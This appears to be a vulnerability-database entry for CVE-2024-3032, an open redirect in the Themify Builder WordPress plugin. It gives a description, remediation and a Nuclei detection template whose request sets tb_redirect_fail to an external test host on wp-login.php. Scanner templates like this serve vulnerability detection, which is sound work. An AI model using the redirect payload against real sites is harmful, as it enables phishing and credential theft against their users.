CVE-2024-3032: WordPress Themify Builder < 7.5.8 - Open Redirect

2025-08-01 WordPress Themify Builder PoC Public

Description

The Themify Builder WordPress plugin before version 7.5.8 contains an open redirect vulnerability. The plugin does not validate the tb_redirect_fail parameter before redirecting users to its value, which could allow attackers to redirect users to malicious websites.

PoC

id: CVE-2024-3032

info:
  name: WordPress Themify Builder < 7.5.8 - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    The Themify Builder WordPress plugin before version 7.5.8 contains an open redirect vulnerability. The plugin does not validate the tb_redirect_fail parameter before redirecting users to its value, which could allow attackers to redirect users to malicious websites.
  impact: |
    Attackers can redirect users to malicious websites, potentially leading to phishing attacks or credential theft.
  remediation: |
    Update Themify Builder to version 7.5.8 or later.
  reference:
    - https://wpscan.com/vulnerability/d130a60c-c36b-4994-9b0e-e52cd7f99387
    - https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-3032
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-3032
    cwe-id: CWE-601
    epss-score: 0.00816
    epss-percentile: 0.55554
    cpe: cpe:2.3:a:themify:builder:*:*:*:*:-:wordpress:*:*
  metadata:
    max-request: 2
    vendor: themify
    product: builder
    fofa-query: body="wp-content/plugins/themify-builder/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,redirect,themify-builder,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "themify-builder"
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: http://oast.me

        log={{username}}&pwd={{password}}&tb_login=1&tb_redirect_fail=https://oast.me

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302

      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
# digest: 490a0046304402206ebdb099a0f6865c36d81d2d374288ad50c36ce371ab3000caa21e2136153a750220610d82e1b699bb5c800d9586d91c790717e50c48eeda2cc09e8aba657297c631:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities